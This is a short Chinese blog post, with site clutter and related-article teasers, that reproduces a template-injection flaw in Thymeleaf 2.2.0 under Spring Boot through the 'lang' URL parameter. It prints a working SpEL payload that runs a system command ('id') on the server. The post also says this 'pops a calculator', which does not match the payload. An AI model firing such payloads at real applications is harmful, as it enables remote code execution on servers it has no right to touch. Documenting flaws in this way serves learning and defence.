SpringBoot-模版引擎-Thymeleaf2.2.0.release注入

最新推荐文章于 2024-05-27 16:11:39 发布

似锦c

最新推荐文章于 2024-05-27 16:11:39 发布

阅读量231

点赞数 1

本文链接：https://blog.youkuaiyun.com/qq_68064663/article/details/132878232

版权

文章讲述了Thymeleaf2.2.0版本中的安全漏洞，当lang参数被注入时，可能导致内网访问。作者通过创建Index-en.html和index.html页面，利用Scanner类执行系统命令，实现了计算器功能并成功复现了漏洞。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

漏洞特征

复现

漏洞特征

存在于这样的界面中，参数lang输入zh_CN显示的是中文

输入en显示的是英文

页面本来是想换一种显示的语言，但是模板引擎存在漏洞就打进内网了

复现

写了两个页面：Index-en.html和index.html,使用的是模版引擎：Thymeleaf2.2.0.release渲染的，这个版本存在漏洞

lang参数注入：

?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22id%22).getInputStream()).next()%7d__::.x

弹出计算器，复现成功

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

似锦c

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

spring框架漏洞整理(Spingboot Thymeleaf模板注入)

计算机毕业论文源码，学生个人网页制作html源码。贴近用户做网络推广和互联网优化。

11-01

1802

Spingboot Thymeleaf模板注入修复方案 1. 设置ResponseBody注解如果设置ResponseBody，则不再调用模板解析 2. 设置redirect重定向 @GetMapping("/safe/redirect") public String redirect(@RequestParam String url) { return "redirect:" + url; //CWE-601, as we can control the hostname in redirect

【Java代码审计】模板注入漏洞篇

大河之犬的博客

04-02

1349

模板引擎通常用于动态生成Web页面、邮件、报告等内容，它们允许开发人员在模板中插入变量、表达式或代码片段，并在生成输出时进行解析和执行。模板注入漏洞通常发生在模板引擎对用户提供的输入进行不充分或不正确的验证和过滤时，导致恶意用户能够注入恶意代码并执行它们。

参与评论您还未登录，请先登录后发表或查看评论

记一次攻防演练中的若依（thymeleaf 模板注入）getshell

蚁景网安学院

05-27

2476

记一次攻防演练中幸运的从若依弱口令到后台getshell的过程和分析。首先，我会先把目标的二级域名拿去使用搜索引擎来搜索收集到包含这个目标二级域名的三级域名或者四级域名的网站，这样可以快速的定位到你所要测试的漏洞资产。

thymeleaf模板注入的问题漏洞

weixin_50234016的博客

11-10

2447

简介：Spring Boot中推荐使用Thymeleaf作为模板引擎.因为Thymeleaf提供了完美的SpringMVC支持。Thymeleaf是一个java类库，他是一个xml/xhtml/html5的模板引擎，可以作为mvc的web应用的view层。一、问题描述：可通过thymeleaf模板注入，篡改用户页面显示内容。漏洞复现访问路径如下：http://localhost:8088/home/__$%7b4*4%7d__::.x 漏洞截图如下：欲实现效果：不要将地址栏的参数动态注入到

第60篇：Thymeleaf模板注入漏洞总结及修复方法（上篇）

ABC_123的博客

05-06

4162

Part1 前言前一阵子朋友让我帮忙看一套金融系统源代码的安全问题，从去年大比赛过后，我好久没审计过代码了，于是就仔细看了看。首先这套系统用的是Springboot框架，而且没有找到Java反序列化漏洞，SQL注入漏洞被预编译写法彻底封死，也没有上传漏洞，Fastjson用的1.2.83版本，Log4j2版本也较新。最后快放弃的时候，重新检查了配置文件，发现了thymeleaf组件，通过ide...

Spring Thymeleaf 模版注入分析

weixin_43263451的博客

08-26

2982

最近在学习审计的时候学习到了关于Spring下Thymeleaf模版注入的知识，随即来记录一下可以说就是Thymeleaf在处理controller返回的templatename时，如果检测到其中包含::则会认为其是一个片段表达式会对其加上~{}进行解析，在解析之前会对该表达式预处理，该过程中通过正则取出两个横线之间的内容(如果没有就不预处理，直接return)即。然后调用标准解析器对其进行解析，因为最终是一个spel表达式，所以导致spel命令执行。.........

【严重】基于 Thymeleaf 沙箱逃逸的 Spring Boot Admin 远程代码执行漏洞（PoC）

murphysec的博客

07-24

1996

Thymeleaf 是用于构建动态的 Web 应用程序的 Java 模板引擎，Spring Boot Admin 是开源的管理和监控 Spring Boot 应用程序的Web UI。

关于Springboot-Mybatis无配置文件注解版的思考

热门推荐

菜鸟不会飞

09-01

1万+

上一篇是搭建了一个springboot+mybatis的项目demo，我们发现，整个项目除了application.properties文件，其他配置文件，如mybatis-config.xml、mapper.xml都不需要，甚至数据库java配置类也不需要。非常的方便，但是这方便却来得稀里糊涂，另外搭建一个springboot+mybatis的方式非常多，但是这对于一个初学者而言...

word源码java-spring-boot:基于springboot的博客系统

06-05

java模板引擎，能处理html,xml,javascript,css,和纯文本 Thymeleaf与springboot集成环境 Tymeleaf 3.0.3 RELEASE Tymeleaf Layout Dialect 2.2.0 修改build.gradlle Thymeleaf API设计 GET/users : 返回用于展示...

最新发布

05-27

一个完整的标准模板看起来像这样： ```xml <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=...

SpringBoot详解

m0_67394002的博客

09-08

853

YAML是 “YAML Ain’t a Markup Language” （YAML不是一种标记语言）的递归缩写。在开发的这种语言时，YAML 的意思其实是：“Yet Another Markup Language”（仍是一种标记语言）*这种语言以数据***作**为中心，而不是以标记语言为重点！以前的配置文件，大多数都是使用xml来配置；比如一个简单的端口配置，我们来对比下yaml和xmlserver：定义Apache Shiro是一个java的安全框架。

thymeleaf文档_Thymeleaf 模板注入命令执行

weixin_39688750的博客

12-10

583

以下文章来源于Medi0cr1ty，作者medi0cr1ty本文配合：https://github.com/veracode-research/spring-view-manipulation/ 食用更佳。背景：Thymeleaf 是与 java 配合使用的一款服务端模板引擎，也是 spring 官方支持的一款服务端模板引擎。他支持 HTML 原型，在 HTML 标签中增加额外的属性来达到模板 ...

Spring boot Thymeleaf 模板注入

qq_32445755的博客

12-20

453

Spring MVC 是通过一个叫 DispatcherServlet 前端控制器的来拦截请求的。根据spring boot定义，如果controller无返回值，则以GetMapping的路由为视图名称。当然，对于每个http请求来讲，其实就是将请求的url作为视图名称，调用模板引擎去解析。在这种情况下，我们只要可以控制请求的controller的参数，一样可以造成RCE漏洞。代码含义如下：用户请求的url为path，参数名称为lang，则服务器通过Thymeleaf模板，去查找相关的模板文件。

渗透测试——漏洞扫描工具

wuli1024的博客

11-20

2643

然后还要将all这个压缩包里的plugin_feed_info.inc提取出来，命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc，然鹅，我提取不出来。将下载好的插件移动到Nessus目录下，然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好，随后将会更新补丁，OK，这样Nessus可以使用了。将会获得一串数字，然后去激活码的这个网站，输入自己的邮箱获取激活码。

thymeleaf模板注入学习与研究--查找与防御

Jinmindong

02-14

787

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供：当然除了有配套的视频，同时也为大家整理了各种文档和书籍资料&工具，并且已经帮大家分好类了。

服务端模板注入（SSTI）下

why811的博客

07-18

919

对于检测来说，模板注入漏洞通常Payload有较为明显的特征，因此可以通过这些特征去完善WAF检测规则，模板注入的危害通常是导致代码执行，具体的危害根据攻击者执行代码的内容来确定，对于比较敏感的行为如命令执行或者文件读取等，可以通过HIPS或者RASP进行检测，但是对于一些不是特别敏感的行为，如仅获取敏感信息，对于这类行为不是很好检测，因此RASP在防御中，还是需要去对模板注入触发的函数进行打点，并进行分析。当settings文件配置不当的时候可以通过include标签和extends标签，读取文件内容。

thymeleaf介绍

weixin_44943389的博客

07-17

788

它的语法简洁、功能丰富，能够有效地将动态数据和静态模板结合在一起，生成具有动态内容的HTML页面。自然模板语法：Thymeleaf使用类似HTML的自然模板语法，可以在HTML文件中直接插入动态内容，并且这些内容在浏览器中也可以正常显示，即使没有进行模板处理。表达式语言：Thymeleaf支持强大的表达式语言，可以在模板中访问和操作应用程序中的数据。表单处理：Thymeleaf提供了方便的表单处理功能，可以自动生成表单字段、验证输入数据，并且支持表单数据的绑定和处理。

漏洞挖掘 | ruoyi框架管理系统漏洞

2301_80127209的博客

04-01

9928

在挖src的时候，可以通过信息收集收集弱口令，然后通过后台弱口令进入后台：发现一个弱口令进去后：【魔方老师提醒才发现，这个蓝色的草丛其实可以大致判断是若依系统】看这界面，是不是很像ruoyi插件一看：前端vue.js加上登录的cookie rememberMe：【登录失败时bp抓包相应包有remeberMe=delete】得知登录为shiro框架八九不离十后台就是ruoyi框架的管理系统了。

如何使用模板引擎 Thymeleaf （Spring Boot ）

wBkvam

05-04

275

模板引擎 Thymeleaf 官方文档常见的模板引擎：JSP、Velocity、FreeMarker、Thymeleaf SpringBoot推荐使用：Thymeleaf ( 语法简单，功能强大) Thymeleaf的使用 1、引入Thymeleaf  <dependency> <groupId>org.springfram...